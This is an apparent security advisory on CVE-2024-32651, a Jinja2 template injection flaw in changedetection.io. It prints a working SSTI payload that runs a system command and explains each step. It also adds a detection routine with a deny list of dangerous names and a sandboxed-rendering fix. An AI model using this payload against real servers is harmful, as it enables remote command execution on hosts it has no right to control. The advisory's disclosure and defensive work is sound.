changedetection.io is a popular open-source tool for monitoring web pages for changes, with website watcher, restock monitor and notification features. A critical security vulnerability, tracked as CVE-2024-32651, has been discovered in it: Server Side Template Injection (SSTI) through the Jinja2 template engine, which allows remote command execution on the server host.

Impact

The impact of this vulnerability is critical: an attacker can take complete control of the server machine without any restriction, execute arbitrary system commands, and potentially open a reverse shell. The risk is somewhat reduced if changedetection.io is placed behind a login page, but the application neither enables this by default nor enforces it.

Exploit Details

The Server Side Template Injection (SSTI) is exploited by submitting malicious Jinja2 template payloads to the application, which renders them with the Jinja2 template engine. Here is an example of such a payload:

{ % for x in ().__class__.__base__.__subclasses__() % } { % if "warning" in x.__name__ % } {{ x()._module.__builtins__["__import__"]('os').popen("id").read() }} { % endif % } { % endfor % }

1. for x in ().__class__.__base__.__subclasses__() - Iterate over the subclasses of Python's base object class

2. if "warning" in x.__name__ - Find the "warning" class

3. x()._module.__builtins__["__import__"]('os').popen("id").read() - Import the 'os' module, execute the 'id' command, and read the output.

This injected code executes the 'id' command; any other arbitrary command can be executed the same way.
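From a detection standpoint, the useful property of this payload is not that it uses Jinja2 delimiters (notification templates legitimately contain simple variable references such as {{ watch_url }} or {{ diff }}) but that its expressions reach into Python internals through dunder attributes and end in an import of 'os' and a command execution. The following check, an added example that is not part of the advisory or of the changedetection.io code base, scans submitted notification bodies for exactly those indicators so that they can be rejected or alerted on before any rendering takes place. The delimiter regex, the list of suspicious names and the sample inputs are constructed for this example.

```python
import re

# Matches Jinja2 variable ({{ ... }}) and statement ({% ... %}) delimiters and
# captures the expression inside. Constructed for this example; it is not a
# full Jinja2 parser, only enough to pull out the expressions to inspect.
JINJA_EXPR = re.compile(r"\{\{(.*?)\}\}|\{%(.*?)%\}", re.DOTALL)

# Identifier tokens inside an expression, e.g. "x", "__class__", "popen".
IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")

# Names that no notification template has a reason to reference. The dunder
# check below covers the attribute-walking part of the payload; this list
# (constructed here) covers the final step: importing os and running a command.
SUSPICIOUS_NAMES = {
    "__import__", "__builtins__", "__subclasses__", "__globals__",
    "popen", "system", "subprocess", "os", "eval", "exec",
}


def find_ssti_indicators(template_text: str) -> list[dict]:
    """Return one finding per Jinja2 expression that reaches into Python
    internals. Plain variable references such as {{ diff }} produce none."""
    findings = []
    for m in JINJA_EXPR.finditer(template_text):
        expr = (m.group(1) or m.group(2) or "").strip()
        names = IDENT.findall(expr)
        dunders = [n for n in names if n.startswith("__") and n.endswith("__")]
        suspicious = [n for n in names if n in SUSPICIOUS_NAMES]
        if dunders or suspicious:
            findings.append({
                "expression": expr,
                "dunder_attributes": sorted(set(dunders)),
                "suspicious_names": sorted(set(suspicious)),
            })
    return findings


def is_safe_notification_body(template_text: str) -> bool:
    """True when a submitted notification body carries no SSTI indicators."""
    return not find_ssti_indicators(template_text)


if __name__ == "__main__":
    # Constructed sample submissions: one benign body and two probes.
    samples = [
        "Change detected at {{ watch_url }}\n{{ diff }}",
        "{{ [].__class__.__mro__ }}",
        '{{ x()._module.__builtins__["__import__"]("os").popen("id").read() }}',
    ]
    for body in samples:
        verdict = "ok" if is_safe_notification_body(body) else "REJECT"
        print(verdict, repr(body), find_ssti_indicators(body))
```

Because the check keys on dunder names and on a short list of dangerous identifiers rather than on the presence of {{ }} or {% %}, it leaves ordinary notification templates alone while still catching the payload above in any of its usual rewordings.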

Remediation

As of now, no fixed version of the software is available and the developer has yet to release a patch for this vulnerability. Until then, users can reduce the risk as follows:

1. Run the application behind a secure login page. Enforce strong authentication and access control so that only authorized users can reach the changedetection.io application.

2. Regularly monitor the official changedetection.io source repository at https://github.com/dgtlmoon/changedetection.io and apply any patches or updates as soon as they are released.
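The two measures above limit who can reach the application; the code-level fix for this class of bug is to stop rendering untrusted text as template source in a default Jinja2 Environment. The following added example (not code from changedetection.io or from the Jinja2 project) places the vulnerable pattern beside two hardened forms: Jinja2's own SandboxedEnvironment, which refuses access to private and dunder attributes and raises SecurityError instead, and the stronger option of keeping the template a fixed string owned by the application and passing user text in as a variable. It assumes the jinja2 package is installed; the template strings, the context values and the helper names are constructed for this example.

```python
from jinja2 import Environment
from jinja2.sandbox import SandboxedEnvironment
from jinja2.exceptions import SecurityError

# Constructed sample inputs: a benign notification template and a probe that
# walks Python object internals the way the advisory's payload does.
BENIGN_TEMPLATE = "Change detected at {{ watch_url }}"
PROBE_TEMPLATE = "{{ [].__class__.__mro__ }}"
CONTEXT = {"watch_url": "https://example.invalid/page"}

# Fixed, application-owned template used by the "data, not template" approach.
FIXED_TEMPLATE = "Change detected at {{ watch_url }}\n{{ body }}"


def render_unsafe(template_text: str) -> str:
    # Vulnerable pattern: untrusted text becomes template source in a default
    # Environment, which exposes every Python attribute to the expression.
    return Environment().from_string(template_text).render(CONTEXT)


def render_sandboxed(template_text: str) -> str:
    # Mitigation 1: SandboxedEnvironment blocks attributes starting with an
    # underscore and unsafe callables; the probe raises SecurityError.
    env = SandboxedEnvironment()
    return env.from_string(template_text).render(CONTEXT)


def render_as_data(user_text: str) -> str:
    # Mitigation 2: the template is a constant the application controls and
    # the user's text is only ever a variable value, never parsed as Jinja2.
    env = SandboxedEnvironment()
    return env.from_string(FIXED_TEMPLATE).render(
        watch_url=CONTEXT["watch_url"], body=user_text
    )


def classify(template_text: str) -> str:
    """Return 'rendered' or 'blocked' for the sandboxed renderer."""
    try:
        render_sandboxed(template_text)
        return "rendered"
    except SecurityError:
        return "blocked"


if __name__ == "__main__":
    print("unsafe, benign :", render_unsafe(BENIGN_TEMPLATE))
    print("unsafe, probe  :", render_unsafe(PROBE_TEMPLATE))
    print("sandbox, benign:", classify(BENIGN_TEMPLATE))
    print("sandbox, probe :", classify(PROBE_TEMPLATE))
    print("as data, probe :", repr(render_as_data(PROBE_TEMPLATE)))
```

Running it shows the default Environment happily printing the probe's class hierarchy, the sandbox rejecting the same probe while still rendering the benign template, and the fixed-template version emitting the probe text verbatim as inert data. Where users genuinely need template features in their notification bodies, the sandbox is the minimum; where they only need substitution of a few known variables, the fixed-template form removes the template injection surface entirely.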

References

1. CVE-2024-32651 - NVD
2. changedetection.io GitHub Repository
3. Jinja2 - Official Documentation

Timeline

Published on: 04/26/2024 00:15:08 UTC
Last modified on: 06/07/2024 19:45:58 UTC